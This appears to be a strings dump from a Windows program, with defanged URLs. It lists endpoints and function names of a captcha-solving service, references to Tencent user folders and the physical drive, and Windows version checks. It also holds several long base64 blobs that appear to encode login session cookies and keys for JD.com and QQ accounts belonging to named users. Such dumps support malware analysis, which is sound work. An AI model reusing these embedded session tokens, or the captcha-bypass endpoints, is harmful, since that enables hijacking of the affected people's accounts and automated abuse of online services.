/Service/MMReg.aspx
pkey
/Service/Pay.aspx
/Upload/MMGetPoint.aspx?U=
ID/KEY/
/Upload/MMProcessing.aspx
ByTypeBytes.JPG
%d-%d-%d
User-Agent:WiseClient-1.0.0.5;
WiseClient-1.0.0.5
&random=xxxxxxxxxxx-ddddddd
ServerPort
Config.ini
-:-:-.%d
tCRYPTDLL.DLL
\\.\PHYSICALDRIVE0
hXXp://iframe.ip138.com/ic.asp
Microsoft Windows Millennium Edition
Microsoft Windows 98
Microsoft Windows 95
%s (Build %d)
Service Pack 6a (Build %d)
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Web Edition
Service Pack %d (Build %d)
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003,
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 "R2"
Windows Server 2008
Windows Vista
Windows Server 2008 R2
Windows 7
ox-x-x-x-x-x
\Tencent\Users\*.*
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
kuoda(mimidama.com)
1, 0, 0, 5
2,3,1,1208
yadinae@qq.com
*\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL#Visual Basic For Applications
*\G{4AFFC9A0-5F99-101B-AF4E-00AA003F0F07}#9.0#0#%Program Files%\Microsoft Office\OFFICE11\MSACC.OLB#Microsoft Access 11.0 Object Library
*\G{00025E01-0000-0000-C000-000000000046}#5.0#0#%Program Files%\Common Files\Microsoft Shared\DAO\DAO
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#%WinDir%\System32\STDOLE2.TLB#OLE Automation
Cmdbars
Reports
*\G{00025E01-0000-0000-C000-000000000046}#5.0#0#%Program Files%\Common Files\Microsoft Shared\DAO\DAO360.DLL#Microsoft DAO 3.6 Object Library
88888888886
22222222220
44444444442
-0010-8000-00AA006D2EA4}#2.1#0#%Program Files%\Common Files\System\ado\msado21.tlb#Microsoft ActiveX Data Objects 2.1 Library
*\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL#Visual Basic For Applications
*\G{4AFFC9A0-5F99-101B-AF4E-00AA003F0F07}#9.0#0#%Program Files% (x86)\Microsoft Office\OFFICE11\MSACC.OLB#Microsoft Access 11.0 Object Library
*\G{00000201-0000-0010-8000-00AA006D2EA4}#2.1#0#%Program Files%\Common Files\System\ado\msado21.tlb#Microsoft ActiveX Data Objects 2.1 Library
Auto Compact"Show Values Limit,Show Values in Indexed4Show Values in Non-Indexed*Show Values in Remote.Show Values in Snapshot*Show Values in Server(Themed Form Controls.Use Default Page Folder&Default Page Folder6Use Default Connection File.Default Connection File
PrimaryKey
X3BzdD15YW5nZ3VhMDQ0NzYxO1RyYWNrSUQ9MU1XWmJjVXdxMUFhMVFHekNBbk96TlMwZDBLcEJrUWhEYjBHNWRnenJGUEk3Ulg5VHJQRjBsTDQzUXpQcjdoTlJ3N2lEVE1tTmRZLXRNUVlEb1BFVzlnO3BpbklkPVBoMlNHdWkyUzNPQ2t0LTJjRmJGdkE7cGluPXlhbmdndWEwNDQ3NjE7bG9naW5pbmc9MTt1bmljaz15YW5nZ3VhMDQ0NzYxO2xpZ2h0aW5nPUVBMEZBQzM0OUZDODMxMDM2RUE3NkEwN0I2OTAzQ0Q4ODRCQUMxODRCNzNDNTcwQjY0QzIwQUJCNkQ1OUJFNUE3QjUwOUNDOUI1MjJGRkFBMTlENjhGQ0YwM0U4QjA5NTQxMDc5NzREOUI3RDMzQTQzRDIzNDIxMEVGNTU5RkVBNkZEOURBMkFDN0MzQTcwOTY0MjcxMjhFQURENzA0NUMxNTVENzcyRDE3NTk0NUEyMjA0MjJENjJDQjY3MzYyMEEyQzU3NzRCNjNGNDNDRUY1MEI5NENCOERCMjRFNURDQjdDRDMyOUM1OTk5MzQ1MDRCN0FGQTY4MERDREU2MDA5RDNCQ0QwODU0OUNDNkJCNUNCODA0MjNGNERCMTU1NDt0aG9yPUFGQUYyRERFRjk5RUZEQjkxMTBFRjA5RUE5ODkzQzY0QjNFN0U0RjAwQURDOTYwQkU4Qzk3OERFRjMyMUREOUE0NjEyMDc0Nzk3MTczNjA1NjE1OUU2QUVBMzYzNTlDNEM0QzM3RDdENjg5RkVCRTgwMDgyQkE4MUM3OTFBOTAyMEI2MUJCRDg5RDk2RDNBQUNDRjZFNDExREQyQzQwNkEwNzQxQjM2MjY3NzI3OTg0NDcxNjQ3NzFFMzQxRkIzNjk0RjA4NDkxRkVBQkU0RUI2MjM2MTVENDJDRTlBMDFBNDBEOEY2NzE3RTZGODgyRThFQzRCQUFBNUFCM0IxNjIyREFEMzc3RjhBQjNCQ0EyRTc5RkZGQ0NEQjVBODFEMjtvbD0xO190cD1yT3clMkI5cGt1ak5zTlVLUG9ZWnppNHclM0QlM0Q7
X3BzdD0lRTclQTElODAlRTglQjglOEYlRTYlOEMlQTglRTUlODElQjclRTUlOEIlQkU7VHJhY2tJRD0xWWo3eG5TRDQ2WDF4YzhDay1zU1ExTVp2bzRobE45YTEyMWpqSTR6UVVSRzFhMEpWeTM1dnlEeXlzOUlSZkYyMkZNT2pzM214clBqenV5TWMxUW1XLTh2ZnFFbEVSd3hzeVpYYlBnRHBwaHhpNG9tUmx6YXROY2E4WXM2V3pyM047cGluSWQ9UzZkbG5NUXZ0Tk1oSlBULTQtek56QTttcD0lRTclQTElODAlRTglQjglOEYlRTYlOEMlQTglRTUlODElQjclRTUlOEIlQkU7cGluPSVFNyVBMSU4MCVFOCVCOCU4RiVFNiU4QyVBOCVFNSU4MSVCNyVFNSU4QiVCRTtsb2dpbmluZz0xO3VuaWNrPWhlc2h1aWh1YWxlO2xpZ2h0aW5nPUU0QUNFMDdBMUIxQTMzQ0YyOTY5RTI0QjM0RUJDRDU4ODUzMEE2ODM0N0U4RUU1OTk3NEUzQUJEMTEzNkM0N0M0MEU0RDhGQTU3QjRCOTdEOTcxMzRGOUQ1RjY5ODUwNjlCRTI1NjRCNUYzMzc3NTI1Mjg2ODc0OEMyMzU3RjI3NDk0QzVENEZGMERENzAzREUwRTc4MkZGOTZCNTEyODdFMTE4Nzc1RjNGRTkyM0E4RjFBQTYxMUU5QTBFN0VGQkIyNDA2NDRDNjdFOTVDRDQ1OTQ0M0RGNzc1ODU5RTMwQTU5NUExNUQwODk4NzUxMkQxNDU4MzBCQzRFNjMwRjI7dGhvcj1DRDU0RkJFRjc4NEQyMTlBQjQzOURDREI2RkREMTc3QTQzRDdFREIwNzA1QkZFMjI0RDIzRUQwMkJBRUY5RDE1OTcxNzU0MDk0MjdENUFFMjQ4MUFEN0NCRTlBQjIxRTdGMzFEQTkzQTBENzZGRTJGMjZCQjE4NUIzODcyMzZFQzE0RUJFMzA4RjYxNDE5Q0IzRUM2Qzg4OUE4RDI2NjgxMjFCQzk4MjNCRkQ1MDhERjNGRjJFRDU5RTQ3ODA0ODVBQUM0MTAwMDM3QjFGODFGMkMzRjY3MEYxQzUxMzMxMzRFMjNCM0E3ODg4MjkzNTA1MEFGQzJBRUIyQ0Q2MUMwO29sPTE7X3RwPWdqSTVPdnJkWmI3bXRHbklOTCUyRldDdUI3UUtXWnNmVGZCb0tENFclMkZMd0xxd1FjSnZCZzEzbG9NZXVYRjRmQXBpOw==
X3BzdD1kYW5namk2OTM2ODA7VHJhY2tJRD0xQUwyVjdsWWQ0RTRNTVVnY2VuQW5zczl0NDVsREdWX0prNDFpUDlPYnZQbFJ0UVBicFhqdnFQcDZVUTRsclctSE13emE5OXQ5SE1NU3E5TEpyR2s1QlE7cGluSWQ9UnAtQlZuUllscTV2TmtmcnFVU3dVQTtwaW49ZGFuZ2ppNjkzNjgwO2xvZ2luaW5nPTE7dW5pY2s9ZGFuZ2ppNjkzNjgwO2xpZ2h0aW5nPTM5RDJBQUFGODhFRDczQUMyNjJDQjFBNTBBMThBRTlEQzZBQTE1ODM0OTNCOUQxQjJFMTBGQ0U1QTA3NzUyQzVFRjExMjc3MjY3RjAxQzQzNjNDRjg5NTU4NUUwNzA5QjdENDNEMzVCMzVCNDlFMkE2QUE5MzI1RDc3MDI5RTBENUQ5QUREMjYwNTFCODEzRUEwMUVGNTVGOEM3N0MyMzNGQTQ1NjI3REE2NEI4QjgwODU5NkZDNTIzQkUzMDUyMzA2N0NBNkJCODUwODcyQTQxODA3NzdBNzZCRTMxRENDRDY2ODNGNEMzRkRGQTUwODk0OUJDNjQ5NDFGNzc2N0JFMTJGMTFCN0VEMzk1MDdEOEY3OUE4RUQ4NzlEMDYxRjt0aG9yPTMwNUNERTIwMkNDQkQwMkY0OTRDOTQxQjg2N0ZBNzdEQ0QxODRDQzg2M0U2MDg0QjNGODY2QjdDMzVCMzMyMzU1NzM1MzRENTI1M0NDNUQ1MEIxQzQ1NjU5QjEwMDNGMEJFNEU4MzUyOUFDQ0E2NDA4QzNEQjYwMkJDMzNFRjU3M0ZFNTM5OTYzMEJGOEI4Q0JCRkM0OENGQjAxMzVCRjQ0NDk1QTlERjFFRjE5NDMzNjEyNTMyRjIzOTA2RjMzMkExREVCMUVGNDMwRTQ4RDUwQjU4MjMxMDQyMUVEQUEyNDAxQjU0QUUzOTM4OUQ1NzRGRDZFOTgyQThEMkY5RjlBNjlGNjg1OEU4NkMxNDMwMURCNzVFMzVDNTA5OENCMDtvbD0xO190cD03aEVqanZkdWNUS3hVNzJZd0FPYWp3JTNEJTNEOw==
X3BzdD0lRTQlQkElQkElRTYlQjAlOTElRTclODglODYlRTglOEYlOEElRTglODAlODU7VHJhY2tJRD0xRm1FTTAtSEVDc3YwYkk4Qk11RWFPc0JsMW5vampreEZQWlhTUzRrLWtGYnRQNlNaLTdCMFJSM2gtQld3LVo2RXJEUjluYk5sU3I3YmpsbE1NelExXzF6U1ZXQTBkRV8zWi11RHRsNGpqMGF4NFJHWWJ3Umcyc1V3NmI2QW9iS3U7cGluSWQ9RWFQYThVSmR4a1NoaGlSWTF3bHBRUTttcD0lRTQlQkElQkElRTYlQjAlOTElRTclODglODYlRTglOEYlOEElRTglODAlODU7cGluPSVFNCVCQSVCQSVFNiVCMCU5MSVFNyU4OCU4NiVFOCU4RiU4QSVFOCU4MCU4NTtsb2dpbmluZz0xO3VuaWNrPSVFNCVCQSVCQSVFNiVCMCU5MSVFNyU4OCU4NiVFOCU4RiU4QSVFOCU4MCU4NTtsaWdodGluZz1GQjgxM0JDQUUwQ0RGNkJCNTRCNkQ4RjdBMTU0RDZBOTkzQjI0OEFDQzBFNEMzNEU4ODY1QjVCMEVCOTJFRDg3MjM1OUZBQjY4REFGREZGRkZGMEU3OEUxMjIyM0JEMEFFMTlFNkFGMDg3QzUwQzg3Q0UwMkNEQjIzRDA4NjZEMDZDNUZDNzA2NDUzRkNEMjg4NzgwRUZGRjMzQ0EyMjg3QjFFQjIzOEUxRUVCQzY4RTNCMDQzMDQxNkU5RjQ1RURBRjNEMzUxMzk5OUQzN0E3MTIyREJGNjFFRDA1NjMzOUM0MTk3N0RDQUZDRjA1QTAwQ0RGNTBFNDg1QTc3OTRCO3Rob3I9QjAxNDM3OUY4RDVEQkM3NzJEODMzRDc3Njk2QTg2Mjg4Rjk2MkQ5NTVGQkE4NjUzQkU0QkEyMUFFMjE5Nzc3QUQyMUE0NzRGNjY3MDhEMDRFM0Y3NzM5NkM3RTlDMkI3ODVDNzk5Qjg2MUY5NjYzQjZCNDkxRDJFMkMyQTVDRjFGQkIzRENGNjdGOTM5MEI2Njg4RTFEOUVDOTNBREIzOUE1M0VFMDE4M0EzREI3RTZFNzREOUVGNTQxQzE3NTJFMUJEQUNGMzRBREI4RDRDNjVBMjlCMjQ4NkYyMEE5MUQ1NEM3ODc1N0U5Q0YwQzY4NERENzAzODBFNTI3MTI3MDtvbD0xO190cD16cHM5Q28yY3N5RnVXcjFlbWV5MGZ5NFRweXUlMkZSamtEMXMlMkZvcmtiTXhnY0xTbUhwcFV3JTJCNnBCand6cjBGTzA4Ow==
X3BzdD1sdW11MDA4NjtUcmFja0lEPTFQVzVIaGtPVElRbGJUcTdfN2xSWUNuZ2tmaXM3LVNFVG1EZ1pGcldDTkdqRDlMUEV1RVVyNWFKOWlsOUlLeU5nRnJ1ZnVId2NXUTh2MmNJbVpvSEpQeHVJMkZWa1FtOFlwTzFjVG1KSGJNNWkxcmtiRmFjWnhnZFZIWTNETU9kUztwaW5JZD0zNWlSZEdZcGI0aTFmZnNmbjk4SS13O21wPWx1bXUwMDg2O3Bpbj1sdW11MDA4Njtsb2dpbmluZz0xO3VuaWNrPWx1bXUwMDg2O2xpZ2h0aW5nPTI1ODlGNzc4NkZBRDI0OUM3MDk4Qzc1NEVDRjMxMTc3ODQwNjRCNjU5NUZERkQ0MThDODZGNTUyOTA3Q0U5RDc2MTExQUQ5QUQ1MkMyMjQyRjFFOENGNzAzQURGMzI2RjEwQUYwRTZDRUExNjAzQjU5NzBBN0EyOUMzOEZCOEM4NjczRkJDMDMwOTA0RTNFNzNFQzU2Njc4QTkzMzM1RUE2NDczOTNGMDg0NTY3RUZCMkE4MTM3QTJCM0VBRjVENDE0N0VDQjdERTBFN0FDMzQwRTcyRERBNEM5RThDQkFDMUQzRTkzNTZCQjM2NjRFMjRDQTVDMUYyNUM2M0U0NTZDQ0ZCQjIzNUJFODhBNDI3RjFBNTU1MTRDNDNCMUM0Njt0aG9yPUQ2ODk0MjNFMDhCQjlDMUREN0NDRTI5QjUxNjY5OTc0RTU0NzcxNkIxNDY0OUQ0MDFBMzVGRDIzNkU1OTYyOUI1MEU5ODQwQ0RDNkYwNzM3NUM1Q0Q3MkNEQkRCRTg3REVENzhFQjg1NjNENTM4NzUwRTU0QzNEMEFFMTIxOENFQjQ1NUVBMEJEQTJENjg4Mzk4NDY4QjdEOTREN0FCNjVDRjQ4MjJERDQ5QzQ5RUE4MUYwMEVDNTdERjhFNDNCMUQ1ODU4OTEwQTgyMkM1NzA4RTIyRTA2NTRGQUM4NDlGM0FFOUJBMEZFQjI1MUY4NDI0Q0E3MzJEREJBMzI2RkVFNTgyREIwRUVGQzQ1Q0I2Qjg4NkE2NDFBMUE1ODAwNjtvbD0xO190cD1Ta1VMJTJGbXBGSm9Ma0wlMkY5OHExR3AlMkZBJTNEJTNEOw==
X3BzdD1nYW5rYW5nODEyOTkzO1RyYWNrSUQ9MXdCQ0IxMXBwZDZ0VUFzdTZmT3NjOU14dERvbUJHMDYxOXI3azZQNTJhVjhaRHJKTzYzM1lxbENaeW15cEdZYVF4U3N2ZHVNNmdEMU43ZGxhdFh2Y01nO3BpbklkPTIyc3dNSFpEZDhWeldfUGh4QzVhZHc7cGluPWdhbmthbmc4MTI5OTM7bG9naW5pbmc9MTt1bmljaz1nYW5rYW5nODEyOTkzO3Rob3I9MTg2MjExMkJEMkI3MTI3MUFGNkY3NjM5OTczM0ZCNDk1RTdGMTlBMTRFNEI5QUM5NERFNUFCRTg3MjkxRThGMkMzRjRFNkQ4NjMyRTg1QTIyMUI1RUI3MUMwQzFFQ0RCMEI3QzNBOTBFQkU2Q0E2MzI1RUU4RUE4OURFNjEzM0U3QUQ4RkMyMkNCRUVBMzc5MzlGMDgxNTREREY3N0E3Qzg2MjMwODM0NEE5OUEwOUZGMUVCRDNGN0REQTE2RDczNkFBODYxRTExNDQ2RDEzMTc1OUNEMzgwMEFCOTI5MzI2QkExRkFEOTg4MjU2N0Y0NUM5MTFBNkQzMUZEM0EzMzQxN0NBN0Q1OEYwNDNFRjVCRjNDNTgxOTc5MEI5QTdBO2xpZ2h0aW5nPTdEMjBFMDg2ODQzNDJCNTk1RTI4NjI0RDQzQkVBMDY1M0MwOUFBMTQzN0I2QjY3RDU3QkU0Q0ZFQzc1MTEzQjI5QkQzRjk2OEFCOTgxMEM5MENCNzY0M0Y5MDExMEQ5QUVDRThBRTlDODQ1NzFFRUFEREM2NUQ3NUJEMDAxRDRBQUY5RjIyMTNCNDJDNTFEMkQzMzY0MTRBRTRFQUY4OTQ5MUQ1OTEzQkZFNDc3ODUyRkE4NkE1QzY4REEzNjQyODZCMTFEQ0Y3NTk1NDUzMEFBRjZBMEM0MkE0MEZCMjdDODlFRkFFMEUwOUIwNDg2MjQ5RDRCOEY0Q0MyOEM5NzhGM0YxNUUzN0EwQ0NGODlGNkVDQzBEMUU3MzYzNTUxMjtvbD0xO190cD1tc3lOeDJRUmlINTJ6SFBZTHN2c1pnJTNEJTNEOw==
X3BzdD0lRTclQTElODAlRTglQjglOEYlRTYlOEMlQTglRTUlODElQjclRTUlOEIlQkU7VHJhY2tJRD0xUzFFQnZTd2FGbDY5UmxManZaakNCQkpVRUxzUW5WU2stNXoyWl9ZZEthYlh5eHVPdnNid1U1U3NmLXhXd1RieHpiTnFxeE5CaUF6SzkzN2RXN29TclE7cGluSWQ9UzZkbG5NUXZ0Tk1oSlBULTQtek56QTtwaW49JUU3JUExJTgwJUU4JUI4JThGJUU2JThDJUE4JUU1JTgxJUI3JUU1JThCJUJFO2xvZ2luaW5nPTE7dW5pY2s9aGVzaHVpaHVhbGU7dGhvcj01REUyMjA0N0VGQzBCQjAzNEVDOTE2OUEyNDM1NDBBRTBEMkM3REU5NUVGOUY2NjMwMUMyOTg4QTRCQjkxRTc2NUU0NDdCMEEzQ0EzQzQ0REM3MEUxNTg3RTVFMTVERTQxREYwQTgxODAwQUE1ODA3N0YzQ0ZCNUY4QUIxNTg2MDMwNzJCMkYyM0ZEOEM1NDAxMzRDQUFCNDUwMTI5N0IyNEZDMzZDOTM4NDY1REEzMEIxRkY2QjlGRUYyNTg2NjcwQjhGMTcyREVEM0I3MEE2NDBCNzY2NjlFQzJFNkE2NjQwNEZBMjRCRTNEREM4QUI0RDE0RkQyQTY0NzQ4QjVDO2xpZ2h0aW5nPUJBMDU1MzMwMzJDRDFDMTc5MkU0NUQ3RTYwQ0NCRDkwMUNCRUUzNzM2RjU0MUU5NkM3MzIyNkIxNTIxRkIyQ0MwNkFGNzVDMEI3MTY3NDQ0N0JFRUM1QjJFRkI0RDkzN0JCNzRBRjg3MjI1NDQ4ODkyMkNEMUVGOEE3Q0M2OTBGMzQ3NTVBMTc4QzZBMDVGQTg2NDhCMzNCOTYxOEQ0RjQ5NkQxMTYxQTQ4NkZBQkRFMUU0NDgzRUM4RTFFQjVGMUY3QzFFNjYzRTc1MkQ4ODA4N0FEN0E0ODdGNEQ0MkY2Q0YwNzg3Mjg1MEQwQ0RFMEJGN0IyNDVDNzRDQUNCNjk7b2w9MTtfdHA9Z2pJNU92cmRaYjdtdEduSU5MJTJGV0N1QjdRS1dac2ZUZkJvS0Q0VyUyRkx3THF3UWNKdkJnMTNsb01ldVhGNGZBcGk7
X3BzdD0lRTUlOEQlQUIlRTclOEUlQUYlRTUlOTAlOUIlRTYlOUYlQUYlRTUlODclQTElRTclOUMlOUZHRjg3O1RyYWNrSUQ9MS12QWduOEVjN1VJdEl4NmhaekIyT3dLUGdlaTZRVThZUzAtMkFrUk1XZ0l1Z2VNSGp2V05HMXgyNGFrV2lSaU9vZDg2bnVVaEdnWmxFUWkybmhtOHRmTDdZVU4tWVJXbzNGOTFLYm1fWHkwO3BpbklkPWM2QWN1NE5Cc255Y1J5UjAxT05QZDBMSGxERU54ZU5rO3Bpbj0lRTUlOEQlQUIlRTclOEUlQUYlRTUlOTAlOUIlRTYlOUYlQUYlRTUlODclQTElRTclOUMlOUZHRjg3O2xvZ2luaW5nPTE7dW5pY2s9JUU1JThEJUFCJUU3JThFJUFGJUU1JTkwJTlCJUU2JTlGJUFGJUU1JTg3JUExJUU3JTlDJTlGR0Y4Nzt0aG9yPUFDNzk0NTY0NjdDMkRGNjZEQ0Y3M0U1MzdBN0Q5QTI1NEU1OUZEOTQ2RDI3RjcyREU0MzhDMzEzMDM3OUJDNENCRjM3QTFBQjcyNjY5QkM2REQ2RDFCMjVDRUREREM0MjY2N0VFMEY5RTU5NDAyQTBCMUIyMEYyMUQwNTJCNjZBQUI2RkMyMThGRUY0RTY5QjJGM0MxQzlERjExNDY2MzA0NDY5MUQyNDQ2RjI1QTlBMEVCQzhDMzVCOTM3NjQ1NzUxODExNEE1ODdCQjA2OTI4MEY5QTY5MjEwNEMzM0EzQTBDNjJEODU3N0UwRDQ2REM0QzcxNzkzM0JERjI5RERCQTgzODVGMEQ5Q0I2NzM5QUYyODM4Q0Q2NDU3QUZDRjtvbD0xO190cD1GbHdRZEhqSkU0JTJCY0h5b3lXTThxR1BYTHQxd0pSRmVqblZRRGNvYm93VGhZNkoyN1klMkJESjElMkJ4bGlTSlAwUkV5TCUyRm0lMkZINFlCck1hc2RLckhKV1V3YkElM0QlM0Q7
X3BzdD0lRTYlQTIlODElRTclQkUlQTQlRTYlQjElOUYlRTYlQUYlOUIlRTklOUMlODclRTYlQTUlQTB5aTYyO1RyYWNrSUQ9MUtwUEhLVjBneHR2NFBQMFNNZ29GQ2pkcEpieFROLUlocmVFVm82RG5rVWduZlExdlJqVkhlLU9obnBYdDVkUVBxbWFubzhJa0NsUXZTVHp3c0RvSVc2amVudkhWNksxbjZSUUk4YjJvS3RFO3BpbklkPU1wRnU4akhQdjV5SUZYd3E4Y0VzY2kwY1FVNnpDNGJ0O3Bpbj0lRTYlQTIlODElRTclQkUlQTQlRTYlQjElOUYlRTYlQUYlOUIlRTklOUMlODclRTYlQTUlQTB5aTYyO2xvZ2luaW5nPTE7dW5pY2s9JUU2JUEyJTgxJUU3JUJFJUE0JUU2JUIxJTlGJUU2JUFGJTlCJUU5JTlDJTg3JUU2JUE1JUEweWk2Mjt0aG9yPTY2MTEzNjc2NjU4ODdBOTI1OEEzQzlERDY1OUYyQTNFNjRBNjgyNTkxNTBFRDRFMkM0NTk3OTYzNjI1RkMzN0M0RDkwMkMwMDYxQUI2NTZBQTAxMkQ1QzdGNjZFNUZDMEREMjQzQjE2REJFNzg2ODhCQ0EwMDkxNjg5N0QwMDhBNDI3OTlCNkY2RUJBRjIwMUY3OTA1Q0NEOUMyNjQ2OUZDOTMyREQ0NTNBQzcwRTJDODNGOTVERTcxQkM0NUY0NUJCQUEwQTQzRTI5ODM1RDU4OTM0NjY1NjUwNURGRDgxRjE2QUZGRDIxQTVEMkFBOTIwNUI3MDg5QjBGQ0MzMDlEOTQ4MzhCMDA1REQwRUFBMjEyNEI2Rjg2MTY0Q0JDRDtvbD0xO190cD1rdEloNFlxMkd5dWhKR2E4OVJyT1QlMkJrS3NhMlRiUVVsZXdlbUElMkJudVk5c2VGVEhTYXUzR0VwWVBUQ1lCM3d6c284RGpsNXU5STdnTUdWdHFOYWYlMkJCdyUzRCUzRDs=X3BzdD0lRTglODglOTIlRTQlQjglQkQlRTclQkElQUYlRTglOEMlODMlRTYlOUQlQkVVVHk4NzQ7VHJhY2tJRD0xTGNLVXlJSjQxa1Q3VkFxcjAwMjVnTGVXZS1hTU9xUUVQVzE1VjItWjd2dDNhcWc2aVU2T3lVMnlEbDVXWU1WNXZXOU02dXcybGl2TEsteW5YVHNna0VuNTBteHVFMnhrZ3dRcW9QaGk4OGM7cGluSWQ9blJ6UlM0MG82V1lHRGZlQ0hlY3Rya3NNUHJDc2NjbTk7cGluPSVFOCU4OCU5MiVFNCVCOCVCRCVFNyVCQSVBRiVFOCU4QyU4MyVFNiU5RCVCRVVUeTg3NDtsb2dpbmluZz0xO3VuaWNrPSVFOCU4OCU5MiVFNCVCOCVCRCVFNyVCQSVBRiVFOCU4QyU4MyVFNiU5RCVCRVVUeTg3NDt0aG9yPTRFMzlDQUU5MkM4MjcwRTY1OEEzMTVDNzUwQ0JCODRDNjk4MTY4NTgwRkY3MkRGOURCODk0QTdFMTJEM0NGOTREMkZBN0Y5QTQ3MTAzRTY4OEI1NjQxRTlCMzYzNTE5OTlDNjIxMTExNDk2MjQ0ODRBMTgwOUE2MUFCOTgyMjkxREU5NDU3RkE2Mjc4OUZBOUJGMUZCREJGQkVEQkVFQjU4MDJDNTE4Q0Q5RTAzNjQ0MDE5Nzc1NDMwMjM5NUJEMjc2RTgxNUI2NzIxMjEwMUZGNDFCRThGQzk5MDMxQ0Y1NDZEOUIyQzhEMDNGMTUyMTE3ODAxRUY5MDgzQkJBQkFGMjUxMEM5MEI2Njg4MjIxMkU5RjBDMEFEN0UyQkU0QztvbD0xO190cD1JTkZleTRPekxRVVdlYm9BRnFPVlJkYkVhdXg5anVZcUxuZ05rZVVyd3pGVDBnYmtUN3JVRGQwbnY5ODB1aDJheFRiWlF0Wk1VUjNuSUlMWlp2OXZMZyUzRCUzRDs=
cHQyZ2d1aW49bzI5MzA3MjY4ODE7IHVpbj1vMjkzMDcyNjg4MTsgc2tleT1ARjkxY2JJa1NzOyBwdG5pY2tfMjkzMDcyNjg4MT03Njc0Njk2ZTY2NzE3MzsgY29uZmlybXVpbj0wOyBwdGlzcD1jdGM7O3J1cmw9aHR0cCUzQSUyRiUyRndxcy5qZC5jb20lMkZteSUyRmluZGV4LnNodG1sJTNGUFRBRyUzRDE3MDA4LjEuNSUyNnNob3duYXYlM0QxOzs7VHJhY2tJRD03dWphYm5CRjQ1dWhpci1IcXRSS3N3cTVUd3U5anB6QXlSSjNnbVVYa0Z4NnY5YmJ4RFpYZ2hBTjdkTzFyZ2JDRWZEODlhWHhROE5XRHFrUlZodjdUemZwd0xob1VmRTh2bDlsLUU2Y3FXYXNiSEtmOXR0LUhpbm1qNzZmWTEzYXprVnpHVjhoRmlQMVVZcmNOWTZZU1J3NzVxenJOaUtMR2Y4LTZYQ0FpSzQ7YnV5X3Vpbj00NjE3OTY3MDMyO2pkcGluPXpib3pibzk2ODI7bmlja25hbWU9dnRpbmZxcztwaWN0dXJlX3VybD1odHRwJTNBJTJGJTJGcS5xbG9nby5jbiUyRnFxYXBwJTJGMTAwMjczMDIwJTJGMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOTUwOTIyQTklMkY0MDtwaW5pZD1fZUdDc2pmV2ExTlMzcmdETUR6aEt3O3BpbnNpZ249ZWU4ODA4OTk1ZmRiYjU0ZWFkYzI5NGY3NThlMDhlOGY7c3Ffb3Blbl9pZD0wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA5NTA5MjJBOTt3Z19za2V5PXpxNkVFRTY4RjM3MjlDRDU7d2dfdWluPTQ2MTc5NjcwMzI7d3Ffc2tleT16cTZFRUU2OEYzNzI5Q0Q1O3dxX3Vpbj00NjE3OTY3MDMyOzs=cHQyZ2d1aW49bzI5MzA3MjY4ODE7IHVpbj1vMjkzMDcyNjg4MTsgc2tleT1ARjkxY2JJa1NzOyBwdG5pY2tfMjkzMDcyNjg4MT03Njc0Njk2ZTY2NzE3MzsgY29uZmlybXVpbj0wOyBwdGlzcD1jdGM7O3J1cmw9aHR0cCUzQSUyRiUyRndxcy5qZC5jb20lMkZteSUyRmluZGV4LnNodG1sJTNGUFRBRyUzRDE3MDA4LjEuNSUyNnNob3duYXYlM0QxOzs7VHJhY2tJRD03dWphYm5CRjQ1dWhpci1IcXRSS3N3cTVUd3U5anB6QXlSSjNnbVVYa0Z4NnY5YmJ4RFpYZ2hBTjdkTzFyZ2JDRWZEODlhWHhROE5XRHFrUlZodjdUemZwd0xob1VmRTh2bDlsLUU2Y3FXYXNiSEtmOXR0LUhpbm1qNzZmWTEzYXprVnpHVjhoRmlQMVVZcmNOWTZZU1J3NzVxenJOaUtMR2Y4LTZYQ0FpSzQ7YnV5X3Vpbj00NjE3OTY3MDMyO2pkcGluPXpib3pibzk2ODI7bmlja25hbWU9dnRpbmZxcztwaWN0dXJlX3VybD1odHRwJTNBJTJGJTJGcS5xbG9nby5jbiUyRnFxYXBwJTJGMTAwMjczMDIwJTJGMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOTUwOTIyQTklMkY0MDtwaW5pZD1fZUdDc2pmV2ExTlMzcmdETUR6aEt3O3BpbnNpZ249ZWU4ODA4OTk1ZmRiYjU0ZWFkYzI5NGY3NThlMDhlOGY7c3Ffb3Blbl9pZD0wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA5NTA5MjJBOTt3Z19za2V5PXpxNkVFRTY4RjM3MjlDRDU7d2dfdWluPTQ2MTc5NjcwMzI7d3Ffc2tleT16cTZFRUU2OEYzNzI5Q0Q1O3dxX3Vpbj00NjE3OTY3MDMyOzs=
0F3D-2DCF-20CE-CEE
CCaptchaRecognizer::recognizeByCodeTypeAndUrl
hXXp://s1.uudati.com:
hXXp://s1.taskok.com:
hXXp://s1.uudama.com:
hXXp://s1.uuwise.com:
/Api/config.aspx
2.0.0.4
WiseClientAPI-2.0.0.4
CCaptchaRecognizer::__UpdateTKEY
CCaptchaRecognizer::_IsNeedLogin
/Api/DecodeImg.aspx
xxxxxxxxxxx
hXXp://p1.uuwise.net:
hXXp://p1.uudama.net:
hXXp://p1.taskok.com:
hXXp://p1.uuwise.com:
hXXp://p1.uudama.com:
CCaptchaRecognizer::easyRecognizeUrl
%d%d%d%d%d
CCaptchaRecognizer::_CalcRandomPort
/Api/VerifyAPIFile.aspx
/Api/UserLogin.aspx
CCaptchaRecognizer::login
/Api/UserReg.aspx
/Api/PayCard.aspx
/Api/ReportError.aspx
CCaptchaRecognizer::reportError
/Api/UserPoint.aspx
|2.0.0.4|
/Api/DecodeResult.aspx
CHttpRequestHelper::_ReadResponse
User-Agent:WiseClient-2.0.0.4;
WiseClient-2.0.0.4
CHttpRequestHelper::_InternalRequest
CHttpRequestHelper::RequestGetImage
CHttpRequestHelper::RequestPost
UUExtConfig.ini
3.cn.pool.ntp.org
2.cn.pool.ntp.org
1.cn.pool.ntp.org
